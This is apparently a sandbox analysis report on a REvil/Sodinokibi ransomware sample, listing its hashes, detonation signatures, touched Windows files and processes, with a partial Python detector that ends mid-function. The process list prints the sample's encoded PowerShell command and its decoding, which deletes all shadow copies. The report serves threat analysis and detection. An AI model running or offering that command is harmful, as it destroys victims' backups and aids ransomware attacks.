Malware Analysis Report

2024-10-19 10:36

Sample ID 230512-fvx5qseb6z
Target 2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe
SHA256 93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7
Tags: sodinokibi
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7

Threat Level: Known bad

The file 2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe was found to be: Known bad.

Malicious Activity Summary

sodinokibi

Sodinokibi family

Sodinokibi/Revil sample

Enumerates connected drives

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-12 05:12

Signatures

Sodinokibi family

sodinokibi

Sodinokibi/Revil sample

Description Indicator Process Target
(no per-row indicator details recorded for this static signature)

Unsigned PE

Description Indicator Process Target
(no per-row indicator details recorded for this static signature)

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-12 05:12

Reported

2023-05-12 05:15

Platform

win7-20230220-en

Max time kernel

23s

Max time network

36s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe"

Signatures

N/A (no behavioural signatures, network activity or file writes were recorded in this 23 s Windows 7 run; the Windows 10 run in behavioral2 is the informative one)

Processes

C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe

"C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-12 05:12

Reported

2023-05-12 05:15

Platform

win10v2004-20230220-en

Max time kernel

172s

Max time network

183s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A

Drops file in Windows directory

(Signature name as assigned by the sandbox. Every row below is an existing file under C:\Windows\WinSxS\Backup that the sample opened for modification; the only new file in the Files section is PowerShell's own script-policy probe, so this reads as the encryptor touching files in the Windows directory rather than dropping a payload there.)

Description Indicator Process Target
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_10.0.19041.1_none_ca60666860ba12d7_app950.fon_e2e577aa C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-g..licy-base.resources_31bf3856ad364e35_10.0.19041.1_de-de_ce34d3262165aa68_gpsvc.dll.mui_0c160ac2 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-network-security_31bf3856ad364e35_10.0.19041.1266_none_41ea436edfbc2e32_wfplwfs.sys_df3e0120 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-u..erservice.resources_31bf3856ad364e35_10.0.19041.1_it-it_33634d5efb5cf151.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-onecore-pnp-umpnpmgr_31bf3856ad364e35_10.0.19041.662_none_052522aee08549d0.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.19041.1_de-de_7b16fe6b5fbc6858.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_qps-ploc_2b765c956db488cf_memtest.efi.mui_71e15c22 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-virtualdiskservice_31bf3856ad364e35_10.0.19041.1202_none_dfaaff89afe4f3d4_vdsldr.exe_20c491b3 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-commonlog.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_f71a10e55724c259_clfs.sys.mui_1310ba12 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_10.0.19041.1_none_ca60666860ba12d7_ega40866.fon_5e8c53bc C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-p..onmanager.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_e2ed1b5da749d72d_partmgr.sys.mui_b800c491 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_10.0.19041.450_none_15f655ce37f84049_scecli.dll_149e0f7b C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-shsvcs.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_f06032ef729ef08b_shsvcs.dll.mui_b69fccab C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-a..structure.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_5af0d35f5d5822e9.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.19041.906_hr-hr_0e05abbb958aae06_msimsg.dll.mui_72e8994f C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-security-ngc-kspsvc_31bf3856ad364e35_10.0.19041.84_none_5f9dd4d3686528a6.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-v..skservice.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_86d2322d49223ce5_vds.exe.mui_2268d934 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-directui-resources19h1_31bf3856ad364e35_10.0.19041.1_none_a747a941ec33876b.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..-netlogon.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_1484daa47b73afab_netlogon.dll.mui_ecbeb9bd C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..os-loader.resources_31bf3856ad364e35_10.0.19041.1_de-de_8398f19094835129_winresume.exe.mui_ff8b5358 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-ntosext_31bf3856ad364e35_10.0.19041.1_none_89e4438cceba3f44_ntosext.sys_e9e096c6 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.19041.1_de-de_70c254192b5ba65d.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-efs-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_02d41c75ec2f1710.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-oem_31bf3856ad364e35_10.0.19041.1_none_b3552a6f4dc424b4_vga863.fon_0805d564 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_10.0.19041.1_de-de_e1c7c5c5782839e2_wmiapsrv.exe.mui_b1567840 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-rasserver_31bf3856ad364e35_10.0.19041.1081_none_2adbc983514c73da_iprtrmgr.dll_50f5fe79 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.19041.1_it-it_b0b29d8e18c561a2_dsreg.dll.mui_5d9efc7e C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..ontroller.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_4ebe9cd18298b39c.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-t..localsessionmanager_31bf3856ad364e35_10.0.19041.1_none_5b35da44a9e83608.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..sition-coreservices_31bf3856ad364e35_10.0.19041.450_none_107cae8412302d3e_wiarpc.dll_5aecac54 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_10.0.19041.1_es-es_8a83f8a2672d374c_wmiapsrv.exe.mui_b1567840 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-ntasn1-dll_31bf3856ad364e35_10.0.19041.546_none_a281e1595804c734.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..opactivitymoderator_31bf3856ad364e35_10.0.19041.1052_none_7ec56a9d21671e02_dam.sys_fdd762d9 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-onecore-ras-base-vpn_31bf3856ad364e35_10.0.19041.1266_none_9123280a93582482.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-tunnel_31bf3856ad364e35_10.0.19041.1_none_595b16922411e0f5_tunnel.sys_90392579 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-win32kbase.resources_31bf3856ad364e35_10.0.19041.1_es-es_d67b0596196ad316.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..-usermode.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_1f5866fbea0202f7_wudfplatform.dll.mui_d815d31a C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-efs-service.resources_31bf3856ad364e35_10.0.19041.1_de-de_59e3467cfd510b4b_efssvc.dll.mui_03cc4e41 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-w..eservices.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_31cb74c54c7c9cce_wiaservc.dll.mui_54051b53 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-u..istration.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_c68aa74741937c24_userdeviceregistration.ngc.dll.mui_d2c6ca95 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_10.0.19041.1_es-es_d53e3423c57572b5.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d..opactivitymoderator_31bf3856ad364e35_10.0.19041.1_none_bfdba9ed0ba30611.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-usermodensi_31bf3856ad364e35_10.0.19041.610_none_5075d9ce26303c63_nsi.dll_e72df756 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-w..-infrastructure-bsp_31bf3856ad364e35_10.0.19041.1_none_78990edc010a0704.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-pcw_31bf3856ad364e35_10.0.19041.1_none_6602a3e1f5dded97.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_10.0.19041.1_de-de_00c609c5ceeb0835_scdeviceenum.dll.mui_815e7662 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-tcpip-driver_31bf3856ad364e35_10.0.19041.1288_none_4cc02c3b6c5e5630.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-directui_31bf3856ad364e35_10.0.19041.1151_none_361ab30ed820622a.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_fi-fi_0bc0c6751faa809f_memtest.efi.mui_71e15c22 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-b..ore-bootmanager-efi_31bf3856ad364e35_10.0.19041.1_none_3d71f65b3bbd6193.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-font-bitmap-terminal_31bf3856ad364e35_10.0.19041.1_none_ca60666860ba12d7_dos737.fon_8de20802 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-wmpdui.resources_31bf3856ad364e35_10.0.19041.1_es-es_2f58d254bd51feff_wmpdui.dll.mui_92411657 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..migration.resources_31bf3856ad364e35_10.0.19041.1_en-us_066aaec65f5dc77a.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-a..llservice.resources_31bf3856ad364e35_10.0.19041.1_de-de_6ace49ac53b0c2de_axinstsv.dll.mui_be092a2d C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_sl-si_4892e179afed964c_comctl32.dll.mui_0da4e682 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-d..ndowmanager-effects_31bf3856ad364e35_10.0.19041.546_none_d951a72ad1ee4c8e_wuceffects.dll_0c15b7d5 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_10.0.19041.906_nb-no_e0132477454b2a7d_msimsg.dll.mui_72e8994f C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-profsvc.resources_31bf3856ad364e35_10.0.19041.1_en-us_1cad2165a3d16b35.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-time-service.resources_31bf3856ad364e35_10.0.19041.1_it-it_95a1a37ffda61620.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.19041.1_none_55d16b95f6e3e25c.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\wow64_microsoft-windows-wmi-core.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_379018f38e600fa9_wmiutils.dll.mui_42583eaf C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.19041.1_el-gr_a89731d17de81b67_comctl32.dll.mui_0da4e682 C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-d2d_31bf3856ad364e35_10.0.19041.546_none_85962dc4bac043a9.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A
File opened for modification C:\Windows\WinSxS\Backup\amd64_microsoft-windows-e..storage-classdriver_31bf3856ad364e35_10.0.19041.1_none_13e0a2d70bde69d7.manifest C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API (tag: ransomware)

This signature fires on the sample-spawned powershell.exe deleting every Win32_ShadowCopy instance over WMI (see the Processes list), which brings up vssvc.exe to service the request. The SeBackupPrivilege, SeRestorePrivilege and SeAuditPrivilege rows above belong to vssvc.exe itself handling that request; the row that points back at the sample is the powershell.exe it launched.

Processes

C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe

"C:\Users\Admin\AppData\Local\Temp\2023-05-11_be059dd5f3442f498bde97f69265ccbd_revil_sodinokibi.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==

Decoded (-e is -EncodedCommand; the argument is base64 of the UTF-16LE script text): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding (WMI's callback sink host, started through DCOM activation when a client such as the powershell.exe above issues WMI calls)

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe (the Volume Shadow Copy service, started on demand to carry out the shadow-copy deletion)
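The encoded command above, decoded and checked for shadow-copy deletion. This is an added Python example written for this report, not sandbox output or sample code; it embeds the powershell.exe command line verbatim from the behavioral2 process list. The function names are the editor's own, and the vssadmin and wmic patterns are included as the other common routes to the same effect, not because this report observed them.

```python
import base64
import re
from typing import Optional

# Command line from the behavioral2 process list on this page, copied verbatim.
# It is the only input the example needs; nothing is fetched from the network.
SAMPLE_CMDLINE = (
    "powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# Documented spellings of the switch (-EncodedCommand, -e, -ec) plus -enc,
# the abbreviation most often seen in the wild.
ENCODED_SWITCH = re.compile(r"^[-/](?:e|ec|enc|encodedcommand)$", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by a powershell -EncodedCommand argument, or None.

    PowerShell expects base64 of the UTF-16LE encoding of the script, so a
    plain base64 -> UTF-8 decode yields NUL-interleaved text and string
    matches against it fail.
    """
    argv = cmdline.split()  # base64 never contains whitespace, so a plain split suffices
    for i in range(len(argv) - 1):
        if ENCODED_SWITCH.match(argv[i]):
            blob = argv[i + 1].strip("\"'")
            blob += "=" * (-len(blob) % 4)  # restore padding lost when copied from logs
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def is_shadow_copy_deletion(script: str) -> bool:
    """True if the script deletes Volume Shadow Copies by any of the usual routes."""
    s = script.lower()
    # Route used by this sample: enumerate Win32_ShadowCopy over WMI, call Delete() on each.
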